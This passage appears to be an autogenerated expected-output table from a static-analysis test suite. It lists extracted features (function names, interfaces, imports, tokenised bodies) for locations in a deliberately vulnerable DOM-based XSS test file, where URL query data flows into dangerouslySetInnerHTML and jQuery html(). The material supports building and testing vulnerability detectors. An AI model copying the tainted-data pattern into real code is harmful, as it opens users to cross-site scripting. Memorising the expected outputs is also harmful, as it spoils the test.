element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:202:28:202:36 | Component | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:202:28:202:36 | Component | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:202:28:202:36 | Component | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:202:28:202:36 | Component | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:203:9:203:19 | constructor | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:203:9:203:19 | constructor | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:203:9:203:19 | constructor | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:203:9:203:19 | constructor | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:203:9:203:19 | constructor | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:203:9:209:9 | constru ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:203:9:209:9 | constru ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:203:9:209:9 | constru ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:203:9:209:9 | constru ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:203:9:209:9 | constru ... } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:203:9:209:9 | constru ... } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:203:9:209:9 | constru ... } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:203:9:209:9 | constru ... } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:203:9:209:9 | constru ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:203:9:209:9 | constru ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:203:19 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:203:19 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:203:19 | tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:203:19 | tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:203:19 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:203:19 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:203:19 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:203:19 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:203:19 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:203:19 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | 'arguments' object of constructor of class C1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | 'arguments' object of constructor of class C1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | 'arguments' object of constructor of class C1 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | 'arguments' object of constructor of class C1 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | 'arguments' object of constructor of class C1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | () {\\n ... } | assignedToPropName | constructor | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | () {\\n ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | () {\\n ... } | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | () {\\n ... } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | () {\\n ... } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | () {\\n ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | exceptional return of constructor of class C1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | exceptional return of constructor of class C1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | exceptional return of constructor of class C1 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | exceptional return of constructor of class C1 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | exceptional return of constructor of class C1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | return of constructor of class C1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | return of constructor of class C1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | return of constructor of class C1 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | return of constructor of class C1 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:203:20:209:9 | return of constructor of class C1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:16 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:16 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:16 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:16 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:16 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:22 | this.state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:22 | this.state | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:22 | this.state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:22 | this.state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:22 | this.state | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:31 | this.state.tainted1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:31 | this.state.tainted1 | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:31 | this.state.tainted1 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:31 | this.state.tainted1 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:31 | this.state.tainted1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:41 | this.st ... tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:41 | this.st ... tainted | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:41 | this.st ... tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:41 | this.st ... tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:204:13:204:41 | this.st ... tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:204:18:204:22 | state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:204:18:204:22 | state | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:204:18:204:22 | state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:204:18:204:22 | state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:204:18:204:22 | state | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:204:24:204:31 | tainted1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:204:24:204:31 | tainted1 | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:204:24:204:31 | tainted1 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted 